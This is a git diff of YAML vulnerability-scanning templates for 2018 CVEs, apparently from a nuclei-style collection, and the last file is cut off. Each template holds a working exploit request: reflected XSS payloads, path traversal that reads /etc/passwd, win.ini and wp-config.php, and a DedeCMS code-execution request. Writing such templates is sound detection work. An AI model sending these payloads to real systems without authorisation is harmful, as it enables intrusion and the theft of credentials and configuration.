b/poc/cve/CVE-2018-20010.yaml index 451bb6c471..ca5de31180 100644 --- a/poc/cve/CVE-2018-20010.yaml +++ b/poc/cve/CVE-2018-20010.yaml @@ -1,33 +1,23 @@ id: CVE-2018-20010 - info: name: DomainMOD 4.11.01 - Cross-Site Scripting author: arafatansari severity: medium description: | - DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/ssl-provider-account.php Username field. - remediation: | - Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. + DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /assets/add/ssl-provider-account.php Username field. reference: - https://www.exploit-db.com/exploits/46373/ - - https://github.com/domainmod/domainmod/issues/88 - https://nvd.nist.gov/vuln/detail/CVE-2018-20010 + - https://github.com/domainmod/domainmod/issues/88 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.8 cve-id: CVE-2018-20010 cwe-id: CWE-79 - epss-score: 0.00153 - epss-percentile: 0.51562 - cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true - max-request: 3 - vendor: domainmod - product: domainmod - tags: domainmod,xss,authenticated,edb,cve,cve2018 - -http: + tags: cve,cve2018,domainmod,xss,authenticated +requests: - raw: - | POST / HTTP/1.1 @@ -44,14 +34,14 @@ http: - | GET /assets/ssl-accounts.php HTTP/1.1 Host: {{Hostname}} - - host-redirects: true + cookie-reuse: true + redirects: true max-redirects: 2 + req-condition: true matchers: - type: dsl dsl: - 'status_code_3 == 200' - - 'contains(header_3, "text/html")' + - 'contains(all_headers_3, "text/html")' - 'contains(body_3, ">")' condition: and -# digest: 490a0046304402201798939eca8555be5e6b817622174e9a0310f12a3c3133646957b3f4760ee5d4022072057a2af63fd3098fd664b0f8dee89e81614783412d16ff09e09fd7cb6bfd79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2018-20011.yaml b/poc/cve/CVE-2018-20011.yaml index b48e1aa0cb..7dbb653583 100644 --- a/poc/cve/CVE-2018-20011.yaml +++ b/poc/cve/CVE-2018-20011.yaml @@ -1,10 +1,13 @@ id: CVE-2018-20011 + info: name: DomainMOD 4.11.01 - Cross-Site Scripting author: arafatansari severity: medium description: | - DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /assets/add/category.php CatagoryName, StakeHolder parameters. + DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/category.php CatagoryName and StakeHolder parameters. + remediation: | + Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/46374/ - https://github.com/domainmod/domainmod/issues/88 @@ -14,10 +17,17 @@ info: cvss-score: 4.8 cve-id: CVE-2018-20011 cwe-id: CWE-79 + epss-score: 0.00153 + epss-percentile: 0.51562 + cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true - tags: cve,cve1028,domainmod,xss,authenticated -requests: + max-request: 3 + vendor: domainmod + product: domainmod + tags: domainmod,xss,authenticated,edb,cve,cve1028 + +http: - raw: - | POST / HTTP/1.1 @@ -34,14 +44,14 @@ requests: - | GET /assets/categories.php HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true - redirects: true + + host-redirects: true max-redirects: 2 - req-condition: true matchers: - type: dsl dsl: - 'status_code_3 == 200' - - 'contains(all_headers_3, "text/html")' + - 'contains(header_3, "text/html")' - 'contains(body_3, ">")' condition: and +# digest: 490a0046304402206dfbf9ca4512470bc41d683d099e0825233aa96201f5206a6c3c5fa163a5681a022077979f25c381fe88c84afe65efaa253fcce9009b98bba05c388f43e13f42b7f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2018-20462.yaml b/poc/cve/CVE-2018-20462.yaml index 382e9a0626..fa78623265 100644 --- a/poc/cve/CVE-2018-20462.yaml +++ b/poc/cve/CVE-2018-20462.yaml @@ -1,33 +1,19 @@ id: CVE-2018-20462 info: - name: WordPress JSmol2WP <=1.07 - Cross-Site Scripting + name: JSmol2WP <= 1.07 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - description: WordPress JSmol2WP version 1.07 and earlier is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via the jsmol.php data parameter. - remediation: | - Update to the latest version of the WordPress JSmol2WP plugin (1.08 or higher) to mitigate this vulnerability. - reference: - - https://github.com/sullo/advisory-archives/blob/master/wordpress-jsmol2wp-CVE-2018-20463-CVE-2018-20462.txt - - https://wpvulndb.com/vulnerabilities/9196 - - https://nvd.nist.gov/vuln/detail/CVE-2018-20462 - - https://www.cbiu.cc/2018/12/WordPress%E6%8F%92%E4%BB%B6jsmol2wp%E6%BC%8F%E6%B4%9E/#%E5%8F%8D%E5%B0%84%E6%80%A7XSS + description: An issue was discovered in the JSmol2WP plugin 1.07 for WordPress. A cross-site scripting (XSS) vulnerability allows remote attackers to inject arbitrary web script or HTML via the jsmol.php data parameter. + reference: https://nvd.nist.gov/vuln/detail/CVE-2018-20462 + tags: cve,cve2018,wordpress,xss,wp-plugin classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2018-20462 cwe-id: CWE-79 - epss-score: 0.00245 - epss-percentile: 0.62379 - cpe: cpe:2.3:a:jsmol2wp_project:jsmol2wp:1.07:*:*:*:*:wordpress:*:* - metadata: - max-request: 1 - vendor: jsmol2wp_project - product: jsmol2wp - framework: wordpress - tags: cve,cve2018,wordpress,xss,wp-plugin -http: +requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8' @@ -35,9 +21,9 @@ http: matchers-condition: and matchers: - type: word - part: body words: - "" + part: body - type: word part: header @@ -47,4 +33,3 @@ http: - type: status status: - 200 -# digest: 490a0046304402206c6f023187230db2b448f76706c6765d299e0ea9caa8bf2a319363df9dcd0f730220572b1af78f7382e75b8fc72538678d35af0741d92e81ff4a64bedc341670a1ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2018-20470.yaml b/poc/cve/CVE-2018-20470.yaml index a9bc920b84..913e599c3a 100644 --- a/poc/cve/CVE-2018-20470.yaml +++ b/poc/cve/CVE-2018-20470.yaml @@ -6,33 +6,25 @@ info: severity: high description: | Tyto Sahi Pro versions through 7.x.x and 8.0.0 are susceptible to a local file inclusion vulnerability in the web reports module which can allow an outside attacker to view contents of sensitive files. - remediation: | - Apply the latest security patches or upgrade to a patched version of Tyto Sahi pro. reference: - https://barriersec.com/2019/06/cve-2018-20470-sahi-pro/ - http://packetstormsecurity.com/files/153330/Sahi-Pro-7.x-8.x-Directory-Traversal.html - https://nvd.nist.gov/vuln/detail/CVE-2018-20470 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-20470 cwe-id: CWE-22 - epss-score: 0.67359 - epss-percentile: 0.97629 - cpe: cpe:2.3:a:sahipro:sahi_pro:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: sahipro - product: sahi_pro - tags: cve,cve2018,lfi,packetstorm + tags: cve,cve2018,lfi -http: +requests: - method: GET path: - "{{BaseURL}}/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected" matchers-condition: and matchers: + - type: word part: body words: @@ -44,4 +36,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203e3562bb4fe1bddb9ba99514b494171ef26490ee71554aecf8bbbfc6a1cca962022100f669e40d43acc671d1ee23c3b308a39c3e62b05b54992737ad5b9eb31e9a11f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# Enhanced by mp on 2022/06/17 diff --git a/poc/cve/CVE-2018-20985.yaml b/poc/cve/CVE-2018-20985.yaml index abd9853113..c641ac61ca 100644 --- a/poc/cve/CVE-2018-20985.yaml +++ b/poc/cve/CVE-2018-20985.yaml @@ -1,49 +1,35 @@ id: CVE-2018-20985 - info: name: WordPress Payeezy Pay <=2.97 - Local File Inclusion author: daffainfo severity: critical description: WordPress Plugin WP Payeezy Pay is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin WP Payeezy Pay version 2.97 is vulnerable; prior versions are also affected. - remediation: | - Update to the latest version of WordPress Payeezy Pay plugin. reference: - https://www.pluginvulnerabilities.com/2018/12/06/our-improved-proactive-monitoring-has-now-caught-a-local-file-inclusion-lfi-vulnerability-as-well/ - https://wordpress.org/plugins/wp-payeezy-pay/#developers - - https://nvd.nist.gov/vuln/detail/CVE-2018-20985 + - https://www.cvedetails.com/cve/CVE-2018-20985/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-20985 cwe-id: CWE-20 - epss-score: 0.01138 - epss-percentile: 0.83095 - cpe: cpe:2.3:a:payeezy:wp_payeezy_pay:*:*:*:*:*:wordpress:*:* - metadata: - max-request: 1 - vendor: payeezy - product: wp_payeezy_pay - framework: wordpress tags: cve,cve2018,wordpress,lfi,plugin - -http: +requests: - method: POST path: - "{{BaseURL}}/wp-content/plugins/wp-payeezy-pay/donate.php" - body: "x_login=../../../wp-config" - matchers-condition: and matchers: - type: word - part: body words: - "The base configuration for WordPress" - "define( 'DB_NAME'," - "define( 'DB_PASSWORD'," condition: and - + part: body - type: status status: - 200 -# digest: 4a0a00473045022100ad5923e4d293095c47baad33b7d259a0d3079206362281205d657f352d4a11de02207be330f31dfdbbc1ff13ab9d93ab64e32adb517d99f9b65a62ab7e4c99a319d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/05/13 diff --git a/poc/cve/CVE-2018-5233.yaml b/poc/cve/CVE-2018-5233.yaml index 549a61109c..8233b5cde4 100644 --- a/poc/cve/CVE-2018-5233.yaml +++ b/poc/cve/CVE-2018-5233.yaml @@ -1,58 +1,34 @@ id: CVE-2018-5233 - info: - name: Grav CMS <1.3.0 - Cross-Site Scripting + name: Grav CMS before 1.3.0 allows XSS. author: pikpikcu severity: medium description: | - Grav CMS before 1.3.0 is vulnerable to cross-site scripting via system/src/Grav/Common/Twig/Twig.php and allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to admin/tools. - remediation: | - Upgrade Grav CMS to version 1.3.0 or later, which includes proper input sanitization to mitigate the XSS vulnerability. + Cross-site scripting (XSS) vulnerability in system/src/Grav/Common/Twig/Twig.php in Grav CMS before 1.3.0 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to admin/tools. reference: + - https://nvd.nist.gov/vuln/detail/CVE-2018-5233 - https://sysdream.com/news/lab/2018-03-15-cve-2018-5233-grav-cms-admin-plugin-reflected-cross-site-scripting-xss-vulnerability/ - http://www.openwall.com/lists/oss-security/2018/03/15/1 - - https://nvd.nist.gov/vuln/detail/CVE-2018-5233 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-5233 cwe-id: CWE-79 - epss-score: 0.00295 - epss-percentile: 0.65927 - cpe: cpe:2.3:a:getgrav:grav_cms:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: getgrav - product: grav_cms - shodan-query: html:"Grav CMS" tags: cve,cve2018,xss,grav - -http: +requests: - method: GET path: - "{{BaseURL}}/admin/tools/a--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and matchers: - type: word - part: body words: - '' - - - type: word part: body - words: - - '/themes/grav' - - 'Grav Admin Login' - - 'data-grav-' - condition: or - + - type: status + status: + - 200 - type: word part: header words: - text/html - - - type: status - status: - - 200 -# digest: 490a0046304402200848c0e3bbbc37663cc87529b1df06095f6739ecd4b4ba46f3b3712e6210218302207a163a02bf5fb8d4d81d1f63374e9b20f26ece02133dcca828ce64c2229a21ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2018-5316.yaml b/poc/cve/CVE-2018-5316.yaml index 975724f566..3e41bc36b8 100644 --- a/poc/cve/CVE-2018-5316.yaml +++ b/poc/cve/CVE-2018-5316.yaml @@ -1,29 +1,46 @@ id: CVE-2018-5316 info: - name: SagePay Server Gateway for WooCommerce <= 1.0.8 - Reflected Cross-Site Scripting (XSS) + name: WordPress SagePay Server Gateway for WooCommerce <1.0.9 - Cross-Site Scripting author: daffainfo severity: medium - description: The SagePay Server Gateway for WooCommerce plugin before 1.0.9 for WordPress has XSS via the includes/pages/redirect.php page parameter. - reference: https://nvd.nist.gov/vuln/detail/CVE-2018-5316 - tags: cve,cve2018,wordpress,xss,wp-plugin,woocommerce + description: WordPress SagePay Server Gateway for WooCommerce before 1.0.9 is vulnerable to cross-site scripting via the includes/pages/redirect.php page parameter. + remediation: | + Update to the latest version of the WordPress SagePay Server Gateway for WooCommerce plugin (1.0.9 or higher) to mitigate this vulnerability. + reference: + - https://wordpress.org/support/topic/sagepay-server-gateway-for-woocommerce-1-0-7-cross-site-scripting/#post-9792337 + - https://wordpress.org/plugins/sagepay-server-gateway-for-woocommerce/#developers + - https://packetstormsecurity.com/files/145459/WordPress-Sagepay-Server-Gateway-For-WooCommerce-1.0.7-XSS.html + - https://nvd.nist.gov/vuln/detail/CVE-2018-5316 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2018-5316 cwe-id: CWE-79 + epss-score: 0.00175 + epss-percentile: 0.54607 + cpe: cpe:2.3:a:patsatech:sagepay_server_gateway_for_woocommerce:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 1 + vendor: patsatech + product: sagepay_server_gateway_for_woocommerce + framework: wordpress + tags: cve2018,wordpress,xss,wp-plugin,wp,woocommerce,packetstorm,cve -requests: +http: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=">' matchers-condition: and matchers: - type: word - words: - - "" part: body + words: + - '">' + - 'Authenticate your card' + condition: and - type: word part: header @@ -33,3 +50,4 @@ requests: - type: status status: - 200 +# digest: 4a0a0047304502207ffbf93ef0b212248a5815daab670c60ab6db91e300e26f1a7fef7604c3419bd022100fe77297109b14e59e64d87a6da363c5cb4dc19df7c163ca7d78d69fb01ed2550:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2018-6008.yaml b/poc/cve/CVE-2018-6008.yaml index 1e302599a3..149bee1fb6 100644 --- a/poc/cve/CVE-2018-6008.yaml +++ b/poc/cve/CVE-2018-6008.yaml @@ -5,9 +5,10 @@ info: author: daffainfo severity: high description: Joomla! Jtag Members Directory 5.3.7 is vulnerable to local file inclusion via the download_file parameter. + remediation: | + Update Joomla! Jtag Members Directory to the latest version or apply the patch provided by the vendor to mitigate the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/43913 - - https://www.cvedetails.com/cve/CVE-2018-6008 - https://packetstormsecurity.com/files/146137/Joomla-Jtag-Members-Directory-5.3.7-Arbitrary-File-Download.html - https://nvd.nist.gov/vuln/detail/CVE-2018-6008 classification: @@ -15,16 +16,23 @@ info: cvss-score: 7.5 cve-id: CVE-2018-6008 cwe-id: CWE-200 - tags: cve,cve2018,joomla,lfi + epss-score: 0.3768 + epss-percentile: 0.96837 + cpe: cpe:2.3:a:joomlatag:jtag_members_directory:5.3.7:*:*:*:*:joomla\!:*:* + metadata: + max-request: 1 + vendor: joomlatag + product: jtag_members_directory + framework: joomla\! + tags: cve,cve2018,joomla,lfi,edb,packetstorm -requests: +http: - method: GET path: - "{{BaseURL}}/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd" matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -33,4 +41,4 @@ requests: status: - 200 -# Enhanced by mp on 2022/07/08 +# digest: 4a0a004730450220520e4c98bcf1f63e20b1f860bc6682887d2a900026825a680bffbaac6ecdb7e8022100e0cacd270cb2c119c285f02df0fbe0b52875b90093b5b53befe56fcc0ac1e34d:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/CVE-2018-6200.yaml b/poc/cve/CVE-2018-6200.yaml index 717531116b..feaf1462b9 100644 --- a/poc/cve/CVE-2018-6200.yaml +++ b/poc/cve/CVE-2018-6200.yaml @@ -1,45 +1,32 @@ id: CVE-2018-6200 - info: - name: vBulletin - Open Redirect + name: vBulletin 3.x.x & 4.2.x - Open Redirect author: 0x_Akoko,daffainfo severity: medium description: | - vBulletin 3.x.x and 4.2.x through 4.2.5 contains an open redirect vulnerability via the redirector.php URL parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. - remediation: | - Apply the latest security patches and updates provided by vBulletin to fix the open redirect vulnerability. + vBulletin 3.x.x and 4.2.x through 4.2.5 has an open redirect via the redirector.php url parameter. reference: - https://cxsecurity.com/issue/WLB-2018010251 - - https://nvd.nist.gov/vuln/detail/CVE-2018-6200 + - https://www.cvedetails.com/cve/CVE-2018-6200 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-6200 cwe-id: CWE-601 - epss-score: 0.00118 - epss-percentile: 0.45709 - cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* metadata: verified: true - max-request: 2 - vendor: vbulletin - product: vbulletin tags: cve,cve2018,redirect,vbulletin - -http: +requests: - method: GET path: - '{{BaseURL}}/redirector.php?url=https://interact.sh' - '{{BaseURL}}/redirector.php?do=nodelay&url=https://interact.sh' - matchers-condition: and matchers: - type: word part: body words: - '' - - type: status status: - 200 -# digest: 4a0a00473045022100a687baa1d283d98366044986b649541d6105d9082908e9db2407e175dded3d08022019caf24c4d237e42c9453d7ea6e43e26ac90f7232c73b8b37e8a7eb7cd0b236d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2018-6910.yaml b/poc/cve/CVE-2018-6910.yaml index 0517017275..19771b7880 100644 --- a/poc/cve/CVE-2018-6910.yaml +++ b/poc/cve/CVE-2018-6910.yaml @@ -1,9 +1,12 @@ id: CVE-2018-6910 + info: - name: DedeCMS 5.7 path disclosure + name: DedeCMS 5.7 - Path Disclosure author: pikpikcu severity: high description: DedeCMS 5.7 allows remote attackers to discover the full path via a direct request for include/downmix.inc.php or inc/inc_archives_functions.php + remediation: | + Apply the latest patch or upgrade to a newer version of DedeCMS to fix the path disclosure vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2018-6910 - https://github.com/kongxin520/DedeCMS/blob/master/DedeCMS_5.7_Bug.md @@ -13,19 +16,30 @@ info: cvss-score: 7.5 cve-id: CVE-2018-6910 cwe-id: CWE-668 + epss-score: 0.03394 + epss-percentile: 0.90397 + cpe: cpe:2.3:a:dedecms:dedecms:5.7:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: dedecms + product: dedecms tags: cve,cve2018,dedecms -requests: + +http: - method: GET path: - "{{BaseURL}}/include/downmix.inc.php" + matchers-condition: and matchers: - type: word + part: body words: - "downmix.inc.php" - "Call to undefined function helper()" - part: body condition: and + - type: status status: - 200 +# digest: 490a0046304402206cce07f47c64ba2b080e9307d96831d00f4b72845c216b637f478acfbf0bf315022031196b26556404b43ebfec71bff4db8c39bf22043ae63fe31e329d82e620995f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2018-7251.yaml b/poc/cve/CVE-2018-7251.yaml index b028397308..17ebdb1a9e 100644 --- a/poc/cve/CVE-2018-7251.yaml +++ b/poc/cve/CVE-2018-7251.yaml @@ -1,38 +1,27 @@ id: CVE-2018-7251 info: - name: Anchor CMS 0.12.3 - Error Log Exposure + name: AnchorCMS Error Log Exposure author: pdteam severity: critical - description: | - Anchor CMS 0.12.3 is susceptible to an error log exposure vulnerability due to an issue in config/error.php. The error log is exposed at an errors.log URI, and contains MySQL credentials if a MySQL error (such as "Too many connections") has occurred. - remediation: | - Upgrade to the latest version of Anchor CMS or apply the necessary patches to fix the error log exposure vulnerability. + tags: cve,cve2018,anchorcms,logs,error + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-7251 + cwe-id: CWE-200 + description: "An issue was discovered in config/error.php in Anchor 0.12.3. The error log is exposed at an errors.log URI, and contains MySQL credentials if a MySQL error (such as \"Too many connections\") has occurred." reference: - https://github.com/anchorcms/anchor-cms/issues/1247 + - http://www.andmp.com/2018/02/advisory-assigned-CVE-2018-7251-in-anchorcms.html - https://twitter.com/finnwea/status/965279233030393856 - http://packetstormsecurity.com/files/154723/Anchor-CMS-0.12.3a-Information-Disclosure.html - https://github.com/anchorcms/anchor-cms/releases/tag/0.12.7 - - https://nvd.nist.gov/vuln/detail/CVE-2018-7251 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2018-7251 - cwe-id: CWE-200 - epss-score: 0.06473 - epss-percentile: 0.92967 - cpe: cpe:2.3:a:anchorcms:anchor:0.12.3:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: anchorcms - product: anchor - tags: cve,cve2018,anchorcms,logs,error,packetstorm -http: +requests: - method: GET path: - '{{BaseURL}}/anchor/errors.log' - matchers: - type: word words: @@ -40,4 +29,3 @@ http: - '"message":' - '"trace":[' condition: and -# digest: 4b0a00483046022100dadbd37e825fce9607c3b308832c2ce7fa5055e72fa42d1d30039519713001e2022100df39665f3d0168e3250ddba29c5a8c3231fddac4a0bac13cc0fd5fc8c963779e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2018-7467.yaml b/poc/cve/CVE-2018-7467.yaml index 209cbb7767..22b15a68ee 100644 --- a/poc/cve/CVE-2018-7467.yaml +++ b/poc/cve/CVE-2018-7467.yaml @@ -1,20 +1,32 @@ id: CVE-2018-7467 + info: - name: AxxonSoft Axxon Next Directory Traversal + name: AxxonSoft Axxon Next - Local File Inclusion author: 0x_Akoko severity: high - description: AxxonSoft Axxon Next suffers from a directory traversal vulnerability. + description: AxxonSoft Axxon Next suffers from a local file inclusion vulnerability. + remediation: | + Apply the latest security patches or updates provided by AxxonSoft to fix the local file inclusion vulnerability. reference: - https://packetstormsecurity.com/files/146604/AxxonSoft-Axxon-Next-Directory-Traversal.html + - https://github.com/sullo/advisory-archives/blob/master/axxonsoft-next-CVE-2018-7467.txt - https://nvd.nist.gov/vuln/detail/CVE-2018-7467 - http://www.projectxit.com.au/blog/2018/2/27/axxonsoft-client-directory-traversal-cve-2018-7467-axxonsoft-axxon-next-axxonsoft-client-directory-traversal-via-an-initial-css2f-substring-in-a-uri-cve-2018-7467 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-7467 - cwe-id: CWE-200 - tags: cve,cve2018,axxonsoft,lfi -requests: + cwe-id: CWE-22 + epss-score: 0.00396 + epss-percentile: 0.70586 + cpe: cpe:2.3:a:axxonsoft:next:-:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: axxonsoft + product: next + tags: axxonsoft,lfi,packetstorm,cve,cve2018 + +http: - raw: - |+ GET //css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\win.ini HTTP/1.1 @@ -29,3 +41,4 @@ requests: - "fonts" - "extensions" condition: and +# digest: 4b0a00483046022100f83145a695e4e24918f2a88e8610b423274c5b556d5c39381a17c01fa4c3fd53022100a94793340e007e0749843872e4f960d65067d383d56c76edeecd880b6255b41f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2018-7700.yaml b/poc/cve/CVE-2018-7700.yaml index 32b525bf7f..bc0ac258ef 100644 --- a/poc/cve/CVE-2018-7700.yaml +++ b/poc/cve/CVE-2018-7700.yaml @@ -1,33 +1,43 @@ id: CVE-2018-7700 info: - name: DedeCMS V5.7SP2 RCE + name: DedeCMS 5.7SP2 - Cross-Site Request Forgery/Remote Code Execution author: pikpikcu severity: high - reference: https://laworigin.github.io/2018/03/07/CVE-2018-7700-dedecms%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/ - tags: cve,cve2018,dedecms,rce + description: | + DedeCMS 5.7SP2 is susceptible to cross-site request forgery with a corresponding impact of arbitrary code execution because the partcode parameter in a tag_test_action.php request can specify a runphp field in conjunction with PHP code. + remediation: | + Apply the latest security patches and update to a newer version of DedeCMS. + reference: + - https://laworigin.github.io/2018/03/07/CVE-2018-7700-dedecms%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/ + - https://nvd.nist.gov/vuln/detail/CVE-2018-7700 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H - cvss-score: 8.80 + cvss-score: 8.8 cve-id: CVE-2018-7700 cwe-id: CWE-352 - description: "DedeCMS 5.7 has CSRF with an impact of arbitrary code execution, because the partcode parameter in a tag_test_action.php request can specify a runphp field in conjunction with PHP code." + epss-score: 0.73235 + epss-percentile: 0.97792 + cpe: cpe:2.3:a:dedecms:dedecms:5.7:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: dedecms + product: dedecms + tags: cve,cve2018,dedecms,rce -requests: +http: - method: GET path: - - "{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field}" + - "{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field}" matchers-condition: and matchers: - - type: word - words: - - "phpinfo" - - "PHP Version" part: body - condition: and + words: + - "4cc32a3a81d2bb37271934a48ce4468a" - type: status status: - 200 +# digest: 4a0a00473045022100a4f8a8a6740cff631691b7f4c46021292ab835ae16b491127abc5d4f06d0bdce0220647f440bc89ff24250a3535ec7888ab3af66dacb94e3cb9d23ef1ec1bb4245fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2018-9118.yaml b/poc/cve/CVE-2018-9118.yaml index f05f5ad51d..a56feb3899 100644 --- a/poc/cve/CVE-2018-9118.yaml +++ b/poc/cve/CVE-2018-9118.yaml @@ -6,29 +6,21 @@ info: severity: high description: | WordPress 99 Robots WP Background Takeover Advertisements 4.1.4 is susceptible to local file inclusion via exports/download.php. - remediation: | - Upgrade to 4.1.15. reference: - https://www.exploit-db.com/exploits/44417 - https://wpvulndb.com/vulnerabilities/9056 - https://99robots.com/docs/wp-background-takeover-advertisements/ - https://nvd.nist.gov/vuln/detail/CVE-2018-9118 + remediation: | + Upgrade to 4.1.15. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-9118 cwe-id: CWE-22 - epss-score: 0.08219 - epss-percentile: 0.93692 - cpe: cpe:2.3:a:99robots:wp_background_takeover_advertisements:*:*:*:*:*:wordpress:*:* - metadata: - max-request: 1 - vendor: 99robots - product: wp_background_takeover_advertisements - framework: wordpress - tags: edb,cve,cve2018,wordpress,wp-plugin,lfi,traversal,wp + tags: cve,cve2018,wordpress,wp-plugin,lfi,traversal,wp -http: +requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php' @@ -44,4 +36,4 @@ http: - "The base configurations of the WordPress" condition: and -# digest: 4a0a00473045022100c1193dffdd7acc16d3f43a76448ac6ef9a5eee0bca32df86cb3fd32c04a8e91b02204437235d21ab0b57daf0582ddd576c27ade92a87c0dbfd8735729239d6d2f295:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/06/15 diff --git "a/poc/cve/CVE-2018\342\200\22314064.yaml" "b/poc/cve/CVE-2018\342\200\22314064.yaml" index d07fc4a0b2..68796ed2a0 100644 --- "a/poc/cve/CVE-2018\342\200\22314064.yaml" +++ "b/poc/cve/CVE-2018\342\200\22314064.yaml" @@ -1,21 +1,26 @@ id: cve-2018-14064 + info: name: VelotiSmart Wifi - Directory Traversal author: 0x_Akoko severity: high reference: | - - https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac - - https://www.exploit-db.com/exploits/45030 + - https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac + - https://www.exploit-db.com/exploits/45030 tags: velotismart,lfi + requests: - method: GET path: - 